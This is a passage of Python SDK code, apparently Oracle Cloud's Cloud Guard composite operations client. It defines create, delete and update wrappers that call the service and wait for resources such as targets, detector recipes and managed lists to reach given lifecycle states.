:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_responder_recipe(create_responder_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_responder_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_target_and_wait_for_state(self, create_target_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_target` and waits for the :py:class:`~oci.cloud_guard.models.Target` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateTargetDetails create_target_details: (required)
Details for the new Target.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.Target.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_target`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_target(create_target_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_target_detector_recipe_and_wait_for_state(self, target_id, attach_target_detector_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_target_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.TargetDetectorRecipe` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param oci.cloud_guard.models.AttachTargetDetectorRecipeDetails attach_target_detector_recipe_details: (required)
Details for associating DetectorRecipe to Target
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.TargetDetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_target_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_target_detector_recipe(target_id, attach_target_detector_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target_detector_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_data_mask_rule_and_wait_for_state(self, data_mask_rule_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_data_mask_rule` and waits for the :py:class:`~oci.cloud_guard.models.DataMaskRule` acted upon
to enter the given state(s).
:param str data_mask_rule_id: (required)
OCID of dataMaskRule
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DataMaskRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_data_mask_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_data_mask_rule(data_mask_rule_id)
operation_result = None
try:
operation_result = self.client.delete_data_mask_rule(data_mask_rule_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_detector_recipe_and_wait_for_state(self, detector_recipe_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.DetectorRecipe` acted upon
to enter the given state(s).
:param str detector_recipe_id: (required)
DetectorRecipe OCID
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_detector_recipe(detector_recipe_id)
operation_result = None
try:
operation_result = self.client.delete_detector_recipe(detector_recipe_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_managed_list_and_wait_for_state(self, managed_list_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_managed_list` and waits for the :py:class:`~oci.cloud_guard.models.ManagedList` acted upon
to enter the given state(s).
:param str managed_list_id: (required)
The cloudguard list OCID to be passed in the request.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ManagedList.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_managed_list`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_managed_list(managed_list_id)
operation_result = None
try:
operation_result = self.client.delete_managed_list(managed_list_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_responder_recipe_and_wait_for_state(self, responder_recipe_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_responder_recipe` and waits for the :py:class:`~oci.cloud_guard.models.ResponderRecipe` acted upon
to enter the given state(s).
:param str responder_recipe_id: (required)
OCID of ResponderRecipe
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ResponderRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_responder_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_responder_recipe(responder_recipe_id)
operation_result = None
try:
operation_result = self.client.delete_responder_recipe(responder_recipe_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_target_and_wait_for_state(self, target_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_target` and waits for the :py:class:`~oci.cloud_guard.models.Target` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.Target.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_target`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_target(target_id)
operation_result = None
try:
operation_result = self.client.delete_target(target_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_data_mask_rule_and_wait_for_state(self, data_mask_rule_id, update_data_mask_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_data_mask_rule` and waits for the :py:class:`~oci.cloud_guard.models.DataMaskRule` acted upon
to enter the given state(s).
:param str data_mask_rule_id: (required)
OCID of dataMaskRule
:param oci.cloud_guard.models.UpdateDataMaskRuleDetails update_data_mask_rule_details: (required)
The information to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DataMaskRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_data_mask_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_data_mask_rule(data_mask_rule_id, update_data_mask_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_mask_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_detector_recipe_and_wait_for_state(self, detector_recipe_id, update_detector_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.DetectorRecipe` acted upon
to enter the given state(s).
:param str detector_recipe_id: (required)
DetectorRecipe OCID
:param oci.cloud_guard.models.UpdateDetectorRecipeDetails update_detector_recipe_details: (required)
Details for the DetectorRecipe to be updated
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_detector_recipe(detector_recipe_id, update_detector_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_detector_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_detector_recipe_detector_rule_and_wait_for_state(self, detector_recipe_id, detector_rule_id, update_detector_recipe_detector_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_detector_recipe_detector_rule` and waits for the :py:class:`~oci.cloud_guard.models.DetectorRecipeDetectorRule` acted upon
to enter the given state(s).
:param str detector_recipe_id: (required)
DetectorRecipe OCID
:param str detector_rule_id: (required)
The key of Detector Rule.
:param oci.cloud_guard.models.UpdateDetectorRecipeDetectorRuleDetails update_detector_recipe_detector_rule_details: (required)
The details to be updated for DetectorRule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DetectorRecipeDetectorRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_detector_recipe_detector_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_detector_recipe_detector_rule(detector_recipe_id, detector_rule_id, update_detector_recipe_detector_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_detector_recipe_detector_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_managed_list_and_wait_for_state(self, managed_list_id, update_managed_list_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_managed_list` and waits for the :py:class:`~oci.cloud_guard.models.ManagedList` acted upon
to enter the given state(s).
:param str managed_list_id: (required)
The cloudguard list OCID to be passed in the request.
:param oci.cloud_guard.models.UpdateManagedListDetails update_managed_list_details: (required)
Details for the ManagedList to be updated
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ManagedList.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_managed_list`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_managed_list(managed_list_id, update_managed_list_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_managed_list(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_problem_status_and_wait_for_state(self, problem_id, update_problem_status_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_problem_status` and waits for the :py:class:`~oci.cloud_guard.models.Problem` acted upon
to enter the given state(s).
:param str problem_id: (required)
OCId of the problem.
:param oci.cloud_guard.models.UpdateProblemStatusDetails update_problem_status_details: (required)
The additional details for the problem.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.Problem.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_problem_status`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_problem_status(problem_id, update_problem_status_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_problem(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_responder_recipe_and_wait_for_state(self, responder_recipe_id, update_responder_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_responder_recipe` and waits for the :py:class:`~oci.cloud_guard.models.ResponderRecipe` acted upon
to enter the given state(s).
:param str responder_recipe_id: (required)
OCID of ResponderRecipe
:param oci.cloud_guard.models.UpdateResponderRecipeDetails update_responder_recipe_details: (required)
The details to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ResponderRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_responder_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_responder_recipe(responder_recipe_id, update_responder_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_responder_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_responder_recipe_responder_rule_and_wait_for_state(self, responder_recipe_id, responder_rule_id, update_responder_recipe_responder_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_responder_recipe_responder_rule` and waits for the :py:class:`~oci.cloud_guard.models.ResponderRecipeResponderRule` acted upon
to enter the given state(s).
:param str responder_recipe_id: (required)
OCID of ResponderRecipe
:param str responder_rule_id: (required)
The id of ResponderRule
:param oci.cloud_guard.models.UpdateResponderRecipeResponderRuleDetails update_responder_recipe_responder_rule_details: (required)
The details to be updated for ResponderRule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ResponderRecipeResponderRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_responder_recipe_responder_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_responder_recipe_responder_rule(responder_recipe_id, responder_rule_id, update_responder_recipe_responder_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_responder_recipe_responder_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_target_and_wait_for_state(self, target_id, update_target_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_target` and waits for the :py:class:`~oci.cloud_guard.models.Target` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param oci.cloud_guard.models.UpdateTargetDetails update_target_details: (required)
The information to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.Target.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_target`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_target(target_id, update_target_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_target_detector_recipe_and_wait_for_state(self, target_id, target_detector_recipe_id, update_target_detector_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.TargetDetectorRecipe` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param str target_detector_recipe_id: (required)
OCID of TargetDetectorRecipe
:param oci.cloud_guard.models.UpdateTargetDetectorRecipeDetails update_target_detector_recipe_details: (required)
The details to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.TargetDetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_target_detector_recipe(target_id, target_detector_recipe_id, update_target_detector_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target_detector_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_target_detector_recipe_detector_rule_and_wait_for_state(self, target_id, target_detector_recipe_id, detector_rule_id, update_target_detector_recipe_detector_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_detector_recipe_detector_rule` and waits for the :py:class:`~oci.cloud_guard.models.TargetDetectorRecipeDetectorRule` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param str target_detector_recipe_id: (required)
OCID of TargetDetectorRecipe
:param str detector_rule_id: (required)
The id of DetectorRule
:param oci.cloud_guard.models.UpdateTargetDetectorRecipeDetectorRuleDetails update_target_detector_recipe_detector_rule_details: (required)
The details to be updated for DetectorRule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.TargetDetectorRecipeDetectorRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_detector_recipe_detector_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_target_detector_recipe_detector_rule(target_id, target_detector_recipe_id, detector_rule_id, update_target_detector_recipe_detector_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target_detector_recipe_detector_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_target_responder_recipe_responder_rule_and_wait_for_state(self, target_id, target_responder_recipe_id, responder_rule_id, update_target_responder_recipe_responder_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_responder_recipe_responder_rule` and waits for the :py:class:`~oci.cloud_guard.models.TargetResponderRecipeResponderRule` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param str target_responder_recipe_id: (required)
OCID of TargetResponderRecipe
:param str responder_rule_id: (required)
The id of ResponderRule
:param oci.cloud_guard.models.UpdateTargetResponderRecipeResponderRuleDetails update_target_responder_recipe_responder_rule_details: (required)
The details to be updated for ResponderRule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.TargetResponderRecipeResponderRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_target_responder_recipe_responder_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_target_responder_recipe_responder_rule(target_id, target_responder_recipe_id, responder_rule_id, update_target_responder_recipe_responder_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target_responder_recipe_responder_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
